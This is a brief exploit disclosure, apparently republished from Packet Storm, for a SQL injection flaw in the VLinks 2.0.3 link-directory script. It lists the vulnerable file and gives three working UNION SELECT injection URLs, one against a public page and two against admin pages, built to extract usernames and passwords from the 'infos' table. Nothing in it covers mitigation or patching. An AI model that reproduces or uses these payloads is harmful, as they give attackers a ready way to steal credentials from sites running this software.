VLinks version 2.0.3 suffers from a remote SQL injection vulnerability.
b23c5588697d4e2b9fed3c47f1cc90d681247e484cbd8dd9bc6554bd7c96e605#########################################################################################
[!x!] Informations:
Name : vlinks
Download : http://www.vlinks.org/ =>http://www.vlinks.org/telechargements/Vlinks2.0.3.zip (And All Version)
Vulnerability : Sql Injection
Author : JIKO(JAWAD)
Contact : jalikom@hotmail.com
Site : No-ExploiT.CoM (Is Back)
Notes : No-ExploiT.CoM Miss
#########################################################################################
[!x!] Bug:
Bugged file is /[path]/page.php?
[Note]
Pass Simple
[/Note]
#########################################################################################
[!x!] Exploit:
Exploit: http://no-exploit.com/forum/site.php?ps=1&idc=1&id=-991 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--
[Admin Panel] ! Need Login
Exploit: http://no-exploit.com/forum/admin/admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--
Exploit: http://no-exploit.com/forum/admin/admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--
########################################################################################
[!x!] To: All friends
Cyber_Devil Allah with you
members [No-exploit.Com]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed